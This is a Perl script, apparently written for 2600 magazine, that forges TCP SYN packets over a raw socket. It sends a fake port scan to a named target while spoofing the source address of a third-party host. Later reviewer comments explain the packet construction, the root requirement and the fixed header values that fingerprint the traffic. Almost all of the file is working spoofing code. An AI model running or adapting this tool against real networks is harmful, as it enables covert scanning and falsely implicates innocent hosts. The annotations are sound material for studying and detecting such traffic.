#!/usr/bin/perl
#
# lego
# perl spoofer demo prog
# written for 2600
#
# based on slapfro, alpha version
# written by miff
#
# TCP fake portscan only.
#
# shout outs: shinex.
#
# Reviewer summary: every packet is an IPv4 + TCP SYN header assembled by
# hand (IP_HDRINCL) and written to a raw socket, with the IP source address
# taken from $source_box instead of the sending host. Opening SOCK_RAW needs
# root (CAP_NET_RAW on Linux), so that privilege is the control point on the
# sending side. Several header fields are hard-coded constants (see
# givehead), which makes the traffic easy to fingerprint on the wire.

use Socket;
use strict qw(refs, subs);   # 'vars' is not requested, so undeclared globals ($data below) are allowed

#SOURCE AND DESINTATION PARAMETERS
# MUST CHANGE THESE.
# Hostnames are resolved in tcpsp00f; the port values are strings but are
# only ever used numerically.

my $target_box = "chrome.9mm.com";
my $target_low_port = "23";
my $target_hi_port = "23";
my $source_box = "funhouse.9mm.com";
my $source_starting_port = "10000";

tcpsp00f($target_box,$target_low_port,$target_hi_port,$source_box,$source_starting_port);

# tcpsp00f: sends one raw TCP SYN to each destination port in
# [$dest_port_low, $dest_port_hi], each carrying a forged IP source of
# $src_host and a source port that increments from $src_port.
# Arguments: two hostnames (resolved here to packed 4-byte addresses) and
# three numeric ports. No return value; the only checked failure is socket().
sub tcpsp00f {
    my ($dest_host,$dest_port_low,$dest_port_hi,$src_host,$src_port) = @_;

    #set constants:
    my ($PROTO_RAW) = 255; # from /etc/protocols
    my ($PROTO_IP) = 0; #ditto
    my ($IP_HDRINCL) = 1; #we set the ip header, thanks

    #look up mah shit...
    # element [4] of gethostbyname's list is the first packed IPv4 address;
    # a name that does not resolve leaves undef here and is not checked.
    $dest_host = (gethostbyname($dest_host))[4];
    $src_host = (gethostbyname($src_host))[4];

    #time to open a raw socket....
    # SOCK_RAW is a privileged operation; bareword handle S, global to the file.
    socket(S, AF_INET, SOCK_RAW, $PROTO_RAW) || die $!;
    #raw socket should be open...

    #now set the bad boy up...
    # IP_HDRINCL: the buffer passed to send() carries its own IP header.
    # Return value of setsockopt is not checked.
    setsockopt(S, $PROTO_IP, $IP_HDRINCL, 1);

    my ($port) = $dest_port_low;

    print "\n INITIATING FAKE PORTSCAN \n\n";

    while ($port <= $dest_port_hi) {
        $src_port++;
        #build a tcp header:
        # $data is never declared or assigned (undef); givehead accepts and ignores it.
        my ($packet) = givehead($src_host, $src_port, $dest_host, $port, $data);
        #bust out the destination...
        # sockaddr_in laid out by hand: family, port (network order), addr, 8 bytes of padding
        my ($dest) = pack('S n a4 x8', AF_INET, $port, $dest_host);
        #send a fux0ring packet
        # send() return value is not checked, so a rejected packet is silent.
        send (S,$packet,0, $dest);
        $port++;
    }
    print "\n portscan sent, beeyatch \n\n ";
}

# givehead: builds the 40-byte IPv4 header + 20-byte TCP SYN header for one
# packet and returns the packed bytes. Only the TCP checksum is computed; the
# IP header checksum field is emitted as 0. Values that are identical in
# every packet this script sends: IP id 31337, TTL 64, DF flag set, TCP
# sequence 790047533, window 124, no TCP options, no payload. Together they
# form a constant on-wire signature. $data is accepted but never used.
sub givehead {
    my ($src_host, $src_port, $dest_host, $dest_port, $data) = @_;

    #HERE WE PLAY WITH THE INSIDES OF THE TCP PIECE
    #AND CALC THE TCP HDR CHECKSUM.

    my $hdr_cksum = 0; # we set it to 0 so we can calculate it
    my $zero = 0; #might need a zero from time to time
    my $proto_tcp = 6; # the protocol number for tcp
    my ($tcplength) = 20; # 20 byte tcp hdr; no data
    # IF YOU ADD DATA, MAKE SURE TO ADD ITS PACKED LENGTH
    # TO THE TCPLENGTH HERE!!!

    # all of the source and destination infoz is passed to us
    # screw wit it in the parent routine...

    my $syn = 790047533; # random syn; try to keep it under 32 bits :)
    my $ack = 0; # zero ack; try to keep it under 32 bits :)
    my $tcp_4bit_hdrlen = "5"; # 5 * 32bit (4 byte) = 20 bytes
    my $tcp_4bit_reserved = 0; # reserved for 0
    my $hdr_n_reserved = $tcp_4bit_hdrlen . $tcp_4bit_reserved; # pack them together
    my $tcp_urg_bit = 0; # URGENT POINTER BIT
    my $tcp_ack_bit = 0; # ACKNOWLEDGEMENT FIELD BIT
    my $tcp_psh_bit = 0; # PUSH REQUEST BIT
    my $tcp_rst_bit = 0; # RST (RESET CONNXION) BIT
    my $tcp_syn_bit = 1; # SYN FLAG BIT #its a syn!!
    my $tcp_fin_bit = 0; # FIN FLAG BIT

    # here we put together 2 reserved fields and the 6 flags to pack as binary.
    # string concatenation of single digits, packed below with B8 -> 0b00000010
    my $tcp_codebits = $zero . $zero . $tcp_urg_bit . $tcp_ack_bit . $tcp_psh_bit . $tcp_rst_bit . $tcp_syn_bit . $tcp_fin_bit;

    my $tcp_windowsize = 124; # default window size
    my $tcp_urgent_pointer = 0; # urgent pointer

    # the following is not a tcp header per se, but a pseudo header
    # used to calculate the tcp checksum. yes, its a pain in the ass.
    # Layout: src addr, dst addr, zero byte, protocol, tcp length, then the
    # TCP header itself with its checksum field ($zero) set to 0.
    my ($pseudo_tcp) = pack ('a4 a4 C C n n n N N H2 B8 n v n',
        $src_host,$dest_host,$zero,$proto_tcp, $tcplength,$src_port,$dest_port,
        $syn,$ack, $hdr_n_reserved,$tcp_codebits, $tcp_windowsize,$zero,$tcp_urgent_pointer);
    my ($tcp_chksum) = &checkfro($pseudo_tcp);

    # PLAY WITH THE INNARDS OF THE IP PIECE HERE!!!
    my $ip_version = "4"; # (nybble) tcp/ip version number (current is 4)
    my $ip_hedlen = "5"; # (nybble) number of 32-bit words in ip header
    my $ver_n_hlen = $ip_version . $ip_hedlen; # we pack 2 nybbles together
    my $ip_tos = "00"; # (byte) ip type-of-service
    my ($totlength) = $tcplength + 20; #tcp + 20 byte ip hdr
    ##
    ## we'll pack totlength into 2 bytes in the packet
    my $ip_fragment_id = 31337; # 2 bytes as well.
    my $ip_3bit_flags = "010"; # ip fragmentation flags (3 bits) (frag, do not frag)
    my $ip_13bit_fragoffset = "0000000000000"; #fragment offset
    my $ip_flags_n_frags = $ip_3bit_flags . $ip_13bit_fragoffset;
    my $ip_ttl = 64; # 64 seconds / hops
    # we have proto_tcp from above...
    my $proto_tcp = 6;
    # we have hdr_checksum from above...
    # all source and destination infoz is passed to us (it
    # gets set in parent routine)
    # change $syn and $ack above in tcp section
    # in fact, everything else in the packet is set above.

    # Full packet: 20-byte IP header ($hdr_cksum still 0) followed by the
    # TCP header with the checksum computed from the pseudo header.
    my ($hdr) = pack ('H2 H2 n n B16 C2 n a4 a4 n n N N H2 B8 n v n',
        $ver_n_hlen, $ip_tos, $totlength, $ip_fragment_id, $ip_flags_n_frags,$ip_ttl, $proto_tcp, $hdr_cksum, $src_host, $dest_host,
        # end of ip header, begin tcp header
        $src_port, $dest_port, $syn,$ack, $hdr_n_reserved,$tcp_codebits, $tcp_windowsize,$tcp_chksum,$tcp_urgent_pointer);
    return $hdr;
}

# checkfro: the standard 16-bit ones'-complement sum (Internet checksum).
# Sums the message as 16-bit words in host byte order, adds a trailing odd
# byte if present, folds the carries, and returns the complemented 16-bit
# result.
sub checkfro {
    #dis sekzhun robbed from someplace else....
    my ( $msg # The message to checkfro
    ) = @_;
    my ($len_msg, # Length of the message
        $num_short, # The number of short words in the message
        $short, # One short word
        $chk # The checkfro
    );
    $len_msg = length($msg);
    $num_short = $len_msg / 2;
    $chk = 0;
    foreach $short (unpack("S$num_short", $msg)) {
        $chk += $short;
    }
    # Add some lead
    $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2;
    $chk = ($chk >> 16) + ($chk & 0xffff); # bust out mah fro pic
    return(~(($chk >> 16) + $chk) & 0xffff); # spray some jheri
}